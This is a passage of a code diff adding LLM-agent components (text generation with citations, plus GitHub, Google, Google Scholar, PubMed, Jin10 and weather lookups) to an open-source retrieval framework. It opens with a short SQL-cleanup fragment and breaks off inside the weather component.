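    ans = re.sub(r'^.*?SELECT ', 'SELECT ', repr(ans), flags=re.IGNORECASE)  # drop the preamble
    ans = re.sub(r';.*?SELECT ', '; SELECT ', ans, flags=re.IGNORECASE)      # normalize gaps between statements
    ans = re.sub(r';[^;]*$', r';', ans)                                      # drop trailing chatter
    print(ans)  # -> SELECT id, name FROM users LIMIT 3;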
155
agent/component/generate.py
Normal file
155
agent/component/generate.py
Normal file
@ -0,0 +1,155 @@
|
||||
#
|
||||
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
|
||||
#
|
||||
# Licensed under the Apache License, Version 2.0 (the "License");
|
||||
# you may not use this file except in compliance with the License.
|
||||
# You may obtain a copy of the License at
|
||||
#
|
||||
# http://www.apache.org/licenses/LICENSE-2.0
|
||||
#
|
||||
# Unless required by applicable law or agreed to in writing, software
|
||||
# distributed under the License is distributed on an "AS IS" BASIS,
|
||||
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
# See the License for the specific language governing permissions and
|
||||
# limitations under the License.
|
||||
#
|
||||
import re
|
||||
from functools import partial
|
||||
import pandas as pd
|
||||
from api.db import LLMType
|
||||
from api.db.services.llm_service import LLMBundle
|
||||
from api.settings import retrievaler
|
||||
from agent.component.base import ComponentBase, ComponentParamBase
|
||||
|
||||
|
||||
class GenerateParam(ComponentParamBase):
|
||||
"""
|
||||
Define the Generate component parameters.
|
||||
"""
|
||||
|
||||
def __init__(self):
|
||||
super().__init__()
|
||||
self.llm_id = ""
|
||||
self.prompt = ""
|
||||
self.max_tokens = 0
|
||||
self.temperature = 0
|
||||
self.top_p = 0
|
||||
self.presence_penalty = 0
|
||||
self.frequency_penalty = 0
|
||||
self.cite = True
|
||||
self.parameters = []
|
||||
|
||||
def check(self):
|
||||
self.check_decimal_float(self.temperature, "[Generate] Temperature")
|
||||
self.check_decimal_float(self.presence_penalty, "[Generate] Presence penalty")
|
||||
self.check_decimal_float(self.frequency_penalty, "[Generate] Frequency penalty")
|
||||
self.check_nonnegative_number(self.max_tokens, "[Generate] Max tokens")
|
||||
self.check_decimal_float(self.top_p, "[Generate] Top P")
|
||||
self.check_empty(self.llm_id, "[Generate] LLM")
|
||||
# self.check_defined_type(self.parameters, "Parameters", ["list"])
|
||||
|
||||
def gen_conf(self):
|
||||
conf = {}
|
||||
if self.max_tokens > 0: conf["max_tokens"] = self.max_tokens
|
||||
if self.temperature > 0: conf["temperature"] = self.temperature
|
||||
if self.top_p > 0: conf["top_p"] = self.top_p
|
||||
if self.presence_penalty > 0: conf["presence_penalty"] = self.presence_penalty
|
||||
if self.frequency_penalty > 0: conf["frequency_penalty"] = self.frequency_penalty
|
||||
return conf
|
||||
|
||||
|
||||
class Generate(ComponentBase):
    component_name = "Generate"

    def get_dependent_components(self):
        cpnts = [para["component_id"] for para in self._param.parameters]
        return cpnts

    def set_cite(self, retrieval_res, answer):
        retrieval_res = retrieval_res.dropna(subset=["vector", "content_ltks"]).reset_index(drop=True)
        if "empty_response" in retrieval_res.columns:
            retrieval_res["empty_response"].fillna("", inplace=True)
        answer, idx = retrievaler.insert_citations(answer,
                                                   [ck["content_ltks"] for _, ck in retrieval_res.iterrows()],
                                                   [ck["vector"] for _, ck in retrieval_res.iterrows()],
                                                   LLMBundle(self._canvas.get_tenant_id(), LLMType.EMBEDDING,
                                                             self._canvas.get_embedding_model()),
                                                   tkweight=0.7, vtweight=0.3)
        doc_ids = set([])
        recall_docs = []
        for i in idx:
            did = retrieval_res.loc[int(i), "doc_id"]
            if did in doc_ids:
                continue
            doc_ids.add(did)
            recall_docs.append({"doc_id": did, "doc_name": retrieval_res.loc[int(i), "docnm_kwd"]})

        del retrieval_res["vector"]
        del retrieval_res["content_ltks"]

        reference = {
            "chunks": [ck.to_dict() for _, ck in retrieval_res.iterrows()],
            "doc_aggs": recall_docs
        }

        if answer.lower().find("invalid key") >= 0 or answer.lower().find("invalid api") >= 0:
            answer += " Please set LLM API-Key in 'User Setting -> Model Providers -> API-Key'"
        res = {"content": answer, "reference": reference}

        return res

    def _run(self, history, **kwargs):
        chat_mdl = LLMBundle(self._canvas.get_tenant_id(), LLMType.CHAT, self._param.llm_id)
        prompt = self._param.prompt

        retrieval_res = self.get_input()
        input = (" - " + "\n - ".join(retrieval_res["content"])) if "content" in retrieval_res else ""
        for para in self._param.parameters:
            cpn = self._canvas.get_component(para["component_id"])["obj"]
            _, out = cpn.output(allow_partial=False)
            if "content" not in out.columns:
                kwargs[para["key"]] = "Nothing"
            else:
                kwargs[para["key"]] = " - " + "\n - ".join(out["content"])

        kwargs["input"] = input
        for n, v in kwargs.items():
            prompt = re.sub(r"\{%s\}" % n, re.escape(str(v)), prompt)

        downstreams = self._canvas.get_component(self._id)["downstream"]
        if kwargs.get("stream") and len(downstreams) == 1 \
                and self._canvas.get_component(downstreams[0])["obj"].component_name.lower() == "answer":
            return partial(self.stream_output, chat_mdl, prompt, retrieval_res)

        if "empty_response" in retrieval_res.columns and not "".join(retrieval_res["content"]):
            empty_res = "\n- ".join(retrieval_res["empty_response"])
            res = {"content": empty_res if empty_res else "Nothing found in knowledgebase!", "reference": []}
            return Generate.be_output(res)

        ans = chat_mdl.chat(prompt, self._canvas.get_history(self._param.message_history_window_size),
                            self._param.gen_conf())
        if self._param.cite and "content_ltks" in retrieval_res.columns and "vector" in retrieval_res.columns:
            df = self.set_cite(retrieval_res, ans)
            return pd.DataFrame(df)

        return Generate.be_output(ans)

    def stream_output(self, chat_mdl, prompt, retrieval_res):
        res = None
        if "empty_response" in retrieval_res.columns and not "".join(retrieval_res["content"]):
            empty_res = "\n- ".join(retrieval_res["empty_response"])
            res = {"content": empty_res if empty_res else "Nothing found in knowledgebase!", "reference": []}
            yield res
            self.set_output(res)
            return

        answer = ""
        for ans in chat_mdl.chat_streamly(prompt, self._canvas.get_history(self._param.message_history_window_size),
                                          self._param.gen_conf()):
            res = {"content": ans, "reference": []}
            answer = ans
            yield res

        if self._param.cite and "content_ltks" in retrieval_res.columns and "vector" in retrieval_res.columns:
            res = self.set_cite(retrieval_res, answer)
            yield res

        self.set_output(res)
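For reference, the placeholder fill in _run above boils down to a repeated re.sub; a minimal standalone sketch (the function and variable names are illustrative, not part of the component):

import re

def fill_prompt(prompt: str, values: dict) -> str:
    # Substitute each "{name}" placeholder with its value. Escaping the value
    # keeps any backslashes in it from being read as group references
    # (e.g. "\1") when re.sub parses the replacement template.
    for name, value in values.items():
        prompt = re.sub(r"\{%s\}" % name, re.escape(str(value)), prompt)
    return prompt

print(fill_prompt("Context:\n{input}\nAnswer briefly.", {"input": " - doc A\n - doc B"}))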
agent/component/github.py (new file, 61 lines)
@@ -0,0 +1,61 @@
#
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from abc import ABC
import pandas as pd
import requests
from agent.settings import DEBUG
from agent.component.base import ComponentBase, ComponentParamBase


class GitHubParam(ComponentParamBase):
    """
    Define the GitHub component parameters.
    """

    def __init__(self):
        super().__init__()
        self.top_n = 10

    def check(self):
        self.check_positive_integer(self.top_n, "Top N")


class GitHub(ComponentBase, ABC):
    component_name = "GitHub"

    def _run(self, history, **kwargs):
        ans = self.get_input()
        ans = " - ".join(ans["content"]) if "content" in ans else ""
        if not ans:
            return GitHub.be_output("")

        try:
            url = 'https://api.github.com/search/repositories?q=' + ans + '&sort=stars&order=desc&per_page=' + str(
                self._param.top_n)
            headers = {"Content-Type": "application/vnd.github+json", "X-GitHub-Api-Version": '2022-11-28'}
            response = requests.get(url=url, headers=headers).json()

            github_res = [{"content": '<a href="' + i["html_url"] + '">' + i["name"] + '</a>' + str(
                i["description"]) + '\n stars:' + str(i['watchers'])} for i in response['items']]
        except Exception as e:
            return GitHub.be_output("**ERROR**: " + str(e))

        if not github_res:
            return GitHub.be_output("")

        df = pd.DataFrame(github_res)
        if DEBUG:
            print(df, ":::::::::::::::::::::::::::::::::")
        return df
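For context, the request above is GitHub's public repository-search endpoint; a minimal standalone sketch of the same call (the query string is illustrative):

import requests

# Search GitHub repositories by keyword, most-starred first. No auth token is
# required for low-volume use, though unauthenticated rate limits are strict.
resp = requests.get(
    "https://api.github.com/search/repositories",
    params={"q": "retrieval augmented generation", "sort": "stars", "order": "desc", "per_page": 5},
    headers={"Accept": "application/vnd.github+json", "X-GitHub-Api-Version": "2022-11-28"},
)
for repo in resp.json().get("items", []):
    print(repo["full_name"], repo["watchers"])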
agent/component/google.py (new file, 96 lines)
@@ -0,0 +1,96 @@
#
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from abc import ABC
from serpapi import GoogleSearch
import pandas as pd
from agent.settings import DEBUG
from agent.component.base import ComponentBase, ComponentParamBase


class GoogleParam(ComponentParamBase):
    """
    Define the Google component parameters.
    """

    def __init__(self):
        super().__init__()
        self.top_n = 10
        self.api_key = "xxx"
        self.country = "cn"
        self.language = "en"

    def check(self):
        self.check_positive_integer(self.top_n, "Top N")
        self.check_empty(self.api_key, "SerpApi API key")
        self.check_valid_value(self.country, "Google Country",
                               ['af', 'al', 'dz', 'as', 'ad', 'ao', 'ai', 'aq', 'ag', 'ar', 'am', 'aw', 'au', 'at',
                                'az', 'bs', 'bh', 'bd', 'bb', 'by', 'be', 'bz', 'bj', 'bm', 'bt', 'bo', 'ba', 'bw',
                                'bv', 'br', 'io', 'bn', 'bg', 'bf', 'bi', 'kh', 'cm', 'ca', 'cv', 'ky', 'cf', 'td',
                                'cl', 'cn', 'cx', 'cc', 'co', 'km', 'cg', 'cd', 'ck', 'cr', 'ci', 'hr', 'cu', 'cy',
                                'cz', 'dk', 'dj', 'dm', 'do', 'ec', 'eg', 'sv', 'gq', 'er', 'ee', 'et', 'fk', 'fo',
                                'fj', 'fi', 'fr', 'gf', 'pf', 'tf', 'ga', 'gm', 'ge', 'de', 'gh', 'gi', 'gr', 'gl',
                                'gd', 'gp', 'gu', 'gt', 'gn', 'gw', 'gy', 'ht', 'hm', 'va', 'hn', 'hk', 'hu', 'is',
                                'in', 'id', 'ir', 'iq', 'ie', 'il', 'it', 'jm', 'jp', 'jo', 'kz', 'ke', 'ki', 'kp',
                                'kr', 'kw', 'kg', 'la', 'lv', 'lb', 'ls', 'lr', 'ly', 'li', 'lt', 'lu', 'mo', 'mk',
                                'mg', 'mw', 'my', 'mv', 'ml', 'mt', 'mh', 'mq', 'mr', 'mu', 'yt', 'mx', 'fm', 'md',
                                'mc', 'mn', 'ms', 'ma', 'mz', 'mm', 'na', 'nr', 'np', 'nl', 'an', 'nc', 'nz', 'ni',
                                'ne', 'ng', 'nu', 'nf', 'mp', 'no', 'om', 'pk', 'pw', 'ps', 'pa', 'pg', 'py', 'pe',
                                'ph', 'pn', 'pl', 'pt', 'pr', 'qa', 're', 'ro', 'ru', 'rw', 'sh', 'kn', 'lc', 'pm',
                                'vc', 'ws', 'sm', 'st', 'sa', 'sn', 'rs', 'sc', 'sl', 'sg', 'sk', 'si', 'sb', 'so',
                                'za', 'gs', 'es', 'lk', 'sd', 'sr', 'sj', 'sz', 'se', 'ch', 'sy', 'tw', 'tj', 'tz',
                                'th', 'tl', 'tg', 'tk', 'to', 'tt', 'tn', 'tr', 'tm', 'tc', 'tv', 'ug', 'ua', 'ae',
                                'uk', 'gb', 'us', 'um', 'uy', 'uz', 'vu', 've', 'vn', 'vg', 'vi', 'wf', 'eh', 'ye',
                                'zm', 'zw'])
        self.check_valid_value(self.language, "Google languages",
                               ['af', 'ak', 'sq', 'ws', 'am', 'ar', 'hy', 'az', 'eu', 'be', 'bem', 'bn', 'bh',
                                'xx-bork', 'bs', 'br', 'bg', 'bt', 'km', 'ca', 'chr', 'ny', 'zh-cn', 'zh-tw', 'co',
                                'hr', 'cs', 'da', 'nl', 'xx-elmer', 'en', 'eo', 'et', 'ee', 'fo', 'tl', 'fi', 'fr',
                                'fy', 'gaa', 'gl', 'ka', 'de', 'el', 'kl', 'gn', 'gu', 'xx-hacker', 'ht', 'ha', 'haw',
                                'iw', 'hi', 'hu', 'is', 'ig', 'id', 'ia', 'ga', 'it', 'ja', 'jw', 'kn', 'kk', 'rw',
                                'rn', 'xx-klingon', 'kg', 'ko', 'kri', 'ku', 'ckb', 'ky', 'lo', 'la', 'lv', 'ln', 'lt',
                                'loz', 'lg', 'ach', 'mk', 'mg', 'ms', 'ml', 'mt', 'mv', 'mi', 'mr', 'mfe', 'mo', 'mn',
                                'sr-me', 'my', 'ne', 'pcm', 'nso', 'no', 'nn', 'oc', 'or', 'om', 'ps', 'fa',
                                'xx-pirate', 'pl', 'pt', 'pt-br', 'pt-pt', 'pa', 'qu', 'ro', 'rm', 'nyn', 'ru', 'gd',
                                'sr', 'sh', 'st', 'tn', 'crs', 'sn', 'sd', 'si', 'sk', 'sl', 'so', 'es', 'es-419', 'su',
                                'sw', 'sv', 'tg', 'ta', 'tt', 'te', 'th', 'ti', 'to', 'lua', 'tum', 'tr', 'tk', 'tw',
                                'ug', 'uk', 'ur', 'uz', 'vu', 'vi', 'cy', 'wo', 'xh', 'yi', 'yo', 'zu'])


class Google(ComponentBase, ABC):
    component_name = "Google"

    def _run(self, history, **kwargs):
        ans = self.get_input()
        ans = " - ".join(ans["content"]) if "content" in ans else ""
        if not ans:
            return Google.be_output("")

        try:
            client = GoogleSearch(
                {"engine": "google", "q": ans, "api_key": self._param.api_key, "gl": self._param.country,
                 "hl": self._param.language, "num": self._param.top_n})
            google_res = [{"content": '<a href="' + i["link"] + '">' + i["title"] + '</a> ' + i["snippet"]}
                          for i in client.get_dict()["organic_results"]]
        except Exception as e:
            return Google.be_output("**ERROR**: " + str(e))

        if not google_res:
            return Google.be_output("")

        df = pd.DataFrame(google_res)
        if DEBUG:
            print(df, ":::::::::::::::::::::::::::::::::")
        return df
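A minimal standalone sketch of the SerpApi call made above (the query and API key are placeholders):

from serpapi import GoogleSearch

# Run one Google search through SerpApi and print title/link pairs.
search = GoogleSearch({
    "engine": "google",
    "q": "vector database",         # illustrative query
    "api_key": "YOUR_SERPAPI_KEY",  # placeholder
    "gl": "us",                     # result country
    "hl": "en",                     # interface language
    "num": 5,
})
for item in search.get_dict().get("organic_results", []):
    print(item["title"], "->", item["link"])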
agent/component/googlescholar.py (new file, 70 lines)
@@ -0,0 +1,70 @@
#
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from abc import ABC
import pandas as pd
from agent.settings import DEBUG
from agent.component.base import ComponentBase, ComponentParamBase
from scholarly import scholarly


class GoogleScholarParam(ComponentParamBase):
    """
    Define the GoogleScholar component parameters.
    """

    def __init__(self):
        super().__init__()
        self.top_n = 6
        self.sort_by = 'relevance'
        self.year_low = None
        self.year_high = None
        self.patents = True

    def check(self):
        self.check_positive_integer(self.top_n, "Top N")
        self.check_valid_value(self.sort_by, "GoogleScholar Sort_by", ['date', 'relevance'])
        self.check_boolean(self.patents, "Whether or not to include patents, defaults to True")


class GoogleScholar(ComponentBase, ABC):
    component_name = "GoogleScholar"

    def _run(self, history, **kwargs):
        ans = self.get_input()
        ans = " - ".join(ans["content"]) if "content" in ans else ""
        if not ans:
            return GoogleScholar.be_output("")

        scholar_client = scholarly.search_pubs(ans, patents=self._param.patents, year_low=self._param.year_low,
                                               year_high=self._param.year_high, sort_by=self._param.sort_by)
        scholar_res = []
        for i in range(self._param.top_n):
            try:
                pub = next(scholar_client)
                scholar_res.append({"content": 'Title: ' + pub['bib']['title'] + '\n_Url: <a href="' + pub[
                    'pub_url'] + '"></a> ' + "\n author: " + ",".join(pub['bib']['author']) + '\n Abstract: ' + pub[
                    'bib'].get('abstract', 'no abstract')})
            except StopIteration:
                break
            except Exception as e:
                print("**ERROR** " + str(e))
                break

        if not scholar_res:
            return GoogleScholar.be_output("")

        df = pd.DataFrame(scholar_res)
        if DEBUG:
            print(df, ":::::::::::::::::::::::::::::::::")
        return df
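Since search_pubs returns a generator, exhaustion surfaces as StopIteration rather than an empty list; a minimal sketch of the same iteration pattern (the query is illustrative):

from scholarly import scholarly

# Iterate the first few publications for a query; stop cleanly when the
# generator runs out of results.
pubs = scholarly.search_pubs("graph neural networks")
for _ in range(3):
    try:
        pub = next(pubs)
    except StopIteration:
        break
    print(pub["bib"]["title"])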
agent/component/jin10.py (new file, 130 lines)
@@ -0,0 +1,130 @@
#
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import json
from abc import ABC
import pandas as pd
import requests
from agent.component.base import ComponentBase, ComponentParamBase


class Jin10Param(ComponentParamBase):
    """
    Define the Jin10 component parameters.
    """

    def __init__(self):
        super().__init__()
        self.type = "flash"
        self.secret_key = "xxx"
        self.flash_type = '1'
        self.calendar_type = 'cj'
        self.calendar_datatype = 'data'
        self.symbols_type = 'GOODS'
        self.symbols_datatype = 'symbols'
        self.contain = ""
        self.filter = ""

    def check(self):
        self.check_valid_value(self.type, "Type", ['flash', 'calendar', 'symbols', 'news'])
        self.check_valid_value(self.flash_type, "Flash Type", ['1', '2', '3', '4', '5'])
        self.check_valid_value(self.calendar_type, "Calendar Type", ['cj', 'qh', 'hk', 'us'])
        self.check_valid_value(self.calendar_datatype, "Calendar DataType", ['data', 'event', 'holiday'])
        self.check_valid_value(self.symbols_type, "Symbols Type", ['GOODS', 'FOREX', 'FUTURE', 'CRYPTO'])
        self.check_valid_value(self.symbols_datatype, 'Symbols DataType', ['symbols', 'quotes'])


class Jin10(ComponentBase, ABC):
    component_name = "Jin10"

    def _run(self, history, **kwargs):
        ans = self.get_input()
        ans = " - ".join(ans["content"]) if "content" in ans else ""
        if not ans:
            return Jin10.be_output("")

        jin10_res = []
        headers = {'secret-key': self._param.secret_key}
        try:
            if self._param.type == "flash":
                params = {
                    'category': self._param.flash_type,
                    'contain': self._param.contain,
                    'filter': self._param.filter
                }
                response = requests.get(
                    url='https://open-data-api.jin10.com/data-api/flash?category=' + self._param.flash_type,
                    headers=headers, data=json.dumps(params))
                response = response.json()
                for i in response['data']:
                    jin10_res.append({"content": i['data']['content']})
            if self._param.type == "calendar":
                params = {
                    'category': self._param.calendar_type
                }
                response = requests.get(
                    url='https://open-data-api.jin10.com/data-api/calendar/' + self._param.calendar_datatype + '?category=' + self._param.calendar_type,
                    headers=headers, data=json.dumps(params))
                response = response.json()
                jin10_res.append({"content": pd.DataFrame(response['data']).to_markdown()})
            if self._param.type == "symbols":
                params = {
                    'type': self._param.symbols_type
                }
                if self._param.symbols_datatype == "quotes":
                    params['codes'] = 'BTCUSD'
                response = requests.get(
                    url='https://open-data-api.jin10.com/data-api/' + self._param.symbols_datatype + '?type=' + self._param.symbols_type,
                    headers=headers, data=json.dumps(params))
                response = response.json()
                if self._param.symbols_datatype == "symbols":
                    for i in response['data']:
                        i['Commodity Code'] = i['c']
                        i['Stock Exchange'] = i['e']
                        i['Commodity Name'] = i['n']
                        i['Commodity Type'] = i['t']
                        del i['c'], i['e'], i['n'], i['t']
                if self._param.symbols_datatype == "quotes":
                    for i in response['data']:
                        i['Selling Price'] = i['a']
                        i['Buying Price'] = i['b']
                        i['Commodity Code'] = i['c']
                        i['Stock Exchange'] = i['e']
                        i['Highest Price'] = i['h']
                        i['Yesterday’s Closing Price'] = i['hc']
                        i['Lowest Price'] = i['l']
                        i['Opening Price'] = i['o']
                        i['Latest Price'] = i['p']
                        i['Market Quote Time'] = i['t']
                        del i['a'], i['b'], i['c'], i['e'], i['h'], i['hc'], i['l'], i['o'], i['p'], i['t']
                jin10_res.append({"content": pd.DataFrame(response['data']).to_markdown()})
            if self._param.type == "news":
                params = {
                    'contain': self._param.contain,
                    'filter': self._param.filter
                }
                response = requests.get(
                    url='https://open-data-api.jin10.com/data-api/news',
                    headers=headers, data=json.dumps(params))
                response = response.json()
                jin10_res.append({"content": pd.DataFrame(response['data']).to_markdown()})
        except Exception as e:
            return Jin10.be_output("**ERROR**: " + str(e))

        if not jin10_res:
            return Jin10.be_output("")

        return pd.DataFrame(jin10_res)
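A minimal sketch of the flash-news request the component issues (the secret key is a placeholder, and the response shape is assumed to match the component's parsing above):

import requests

# Fetch the latest Jin10 flash-news items; category "1" follows the
# component's flash_type convention.
resp = requests.get(
    "https://open-data-api.jin10.com/data-api/flash",
    params={"category": "1"},
    headers={"secret-key": "YOUR_JIN10_KEY"},  # placeholder
).json()
for item in resp.get("data", []):
    print(item["data"].get("content", ""))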
agent/component/keyword.py (new file, 65 lines)
@@ -0,0 +1,65 @@
#
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import re
from abc import ABC
from api.db import LLMType
from api.db.services.llm_service import LLMBundle
from agent.component import GenerateParam, Generate
from agent.settings import DEBUG


class KeywordExtractParam(GenerateParam):
    """
    Define the KeywordExtract component parameters.
    """

    def __init__(self):
        super().__init__()
        self.top_n = 1

    def check(self):
        super().check()
        self.check_positive_integer(self.top_n, "Top N")

    def get_prompt(self):
        self.prompt = """
- Role: You're a question analyzer.
- Requirements:
  - Summarize the user's question and give the top %s most important keywords/phrases.
  - Use commas as delimiters to separate keywords/phrases.
- Answer format: (in the language of the user's question)
  - keyword:
""" % self.top_n
        return self.prompt


class KeywordExtract(Generate, ABC):
    component_name = "KeywordExtract"

    def _run(self, history, **kwargs):
        q = ""
        for r, c in self._canvas.history[::-1]:
            if r == "user":
                q += c
                break

        chat_mdl = LLMBundle(self._canvas.get_tenant_id(), LLMType.CHAT, self._param.llm_id)
        ans = chat_mdl.chat(self._param.get_prompt(), [{"role": "user", "content": q}],
                            self._param.gen_conf())

        ans = re.sub(r".*keyword:", "", ans).strip()
        if DEBUG:
            print(ans, ":::::::::::::::::::::::::::::::::")
        return KeywordExtract.be_output(ans)
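To make the parse step concrete, here is the strip on a canned model reply (the reply text is hypothetical):

import re

# A hypothetical model reply following the prompt's answer format.
reply = "- keyword: retrieval, embeddings, reranking"
keywords = re.sub(r".*keyword:", "", reply).strip()
print(keywords)  # -> "retrieval, embeddings, reranking"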
agent/component/message.py (new file, 53 lines)
@@ -0,0 +1,53 @@
#
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import random
from abc import ABC
from functools import partial
from agent.component.base import ComponentBase, ComponentParamBase


class MessageParam(ComponentParamBase):
    """
    Define the Message component parameters.
    """

    def __init__(self):
        super().__init__()
        self.messages = []

    def check(self):
        self.check_empty(self.messages, "[Message]")
        return True


class Message(ComponentBase, ABC):
    component_name = "Message"

    def _run(self, history, **kwargs):
        if kwargs.get("stream"):
            return partial(self.stream_output)

        return Message.be_output(random.choice(self._param.messages))

    def stream_output(self):
        res = None
        if self._param.messages:
            res = {"content": random.choice(self._param.messages)}
            yield res

        self.set_output(res)
agent/component/pubmed.py (new file, 69 lines)
@@ -0,0 +1,69 @@
#
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from abc import ABC
from Bio import Entrez
import re
import pandas as pd
import xml.etree.ElementTree as ET
from agent.settings import DEBUG
from agent.component.base import ComponentBase, ComponentParamBase


class PubMedParam(ComponentParamBase):
    """
    Define the PubMed component parameters.
    """

    def __init__(self):
        super().__init__()
        self.top_n = 5
        self.email = "A.N.Other@example.com"

    def check(self):
        self.check_positive_integer(self.top_n, "Top N")


class PubMed(ComponentBase, ABC):
    component_name = "PubMed"

    def _run(self, history, **kwargs):
        ans = self.get_input()
        ans = " - ".join(ans["content"]) if "content" in ans else ""
        if not ans:
            return PubMed.be_output("")

        try:
            Entrez.email = self._param.email
            pubmedids = Entrez.read(Entrez.esearch(db='pubmed', retmax=self._param.top_n, term=ans))['IdList']
            pubmedcnt = ET.fromstring(re.sub(r'<(/?)b>|<(/?)i>', '',
                                             Entrez.efetch(db='pubmed', id=",".join(pubmedids),
                                                           retmode="xml").read().decode("utf-8")))
            pubmed_res = [{"content": 'Title:' + child.find("MedlineCitation").find("Article").find(
                "ArticleTitle").text + '\nUrl:<a href=" https://pubmed.ncbi.nlm.nih.gov/' + child.find(
                "MedlineCitation").find("PMID").text + '">' + '</a>\n' + 'Abstract:' + (
                child.find("MedlineCitation").find("Article").find("Abstract").find(
                    "AbstractText").text if child.find("MedlineCitation").find(
                    "Article").find("Abstract") else "No abstract available")} for child in
                pubmedcnt.findall("PubmedArticle")]
        except Exception as e:
            return PubMed.be_output("**ERROR**: " + str(e))

        if not pubmed_res:
            return PubMed.be_output("")

        df = pd.DataFrame(pubmed_res)
        if DEBUG:
            print(df, ":::::::::::::::::::::::::::::::::")
        return df
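The Entrez flow above is a two-step esearch/efetch; a minimal standalone sketch (the query and e-mail address are placeholders):

from Bio import Entrez

# Look up a handful of PubMed IDs for a query, then fetch their records as XML.
Entrez.email = "you@example.com"  # NCBI asks for a contact address
ids = Entrez.read(Entrez.esearch(db="pubmed", term="large language models", retmax=3))["IdList"]
xml_text = Entrez.efetch(db="pubmed", id=",".join(ids), retmode="xml").read()
print(ids)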
agent/component/qweather.py (new file, 111 lines)
@@ -0,0 +1,111 @@
#
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from abc import ABC
import pandas as pd
import requests
from agent.component.base import ComponentBase, ComponentParamBase


class QWeatherParam(ComponentParamBase):
    """
    Define the QWeather component parameters.
    """

    def __init__(self):
        super().__init__()
        self.web_apikey = "xxx"
        self.lang = "zh"
        self.type = "weather"
        self.user_type = 'free'
        self.error_code = {
            "204": "The request succeeded, but the region you are querying has no data available at this time.",
            "400": "Request error: the request may contain incorrect parameters or be missing mandatory ones.",
            "401": "Authentication failed: possibly a wrong key, a wrong digital signature, or a wrong key type (e.g. using an SDK key to access the Web API).",
            "402": "Access quota exceeded, or the balance is insufficient to continue using the service; you can recharge, upgrade your quota, or wait for it to reset.",
            "403": "No access: the bound PackageName, BundleID, or domain/IP address may be inconsistent, or the data requires additional payment.",
            "404": "The queried data or region does not exist.",
            "429": "Exceeded the QPM limit (queries per minute); please refer to the QPM description.",
            "500": "No response or timeout; the interface service is abnormal, please contact us."
        }
        # Weather
        self.time_period = 'now'

    def check(self):
        self.check_empty(self.web_apikey, "QWeather API key")
        self.check_valid_value(self.type, "Type", ["weather", "indices", "airquality"])
        self.check_valid_value(self.user_type, "Free subscription or paid subscription", ["free", "paid"])
        self.check_valid_value(self.lang, "Use language",
                               ['zh', 'zh-hant', 'en', 'de', 'es', 'fr', 'it', 'ja', 'ko', 'ru', 'hi', 'th', 'ar', 'pt',
                                'bn', 'ms', 'nl', 'el', 'la', 'sv', 'id', 'pl', 'tr', 'cs', 'et', 'vi', 'fil', 'fi',
                                'he', 'is', 'nb'])
        self.check_valid_value(self.time_period, "Time period", ['now', '3d', '7d', '10d', '15d', '30d'])


class QWeather(ComponentBase, ABC):
    component_name = "QWeather"

    def _run(self, history, **kwargs):
        ans = self.get_input()
        ans = "".join(ans["content"]) if "content" in ans else ""
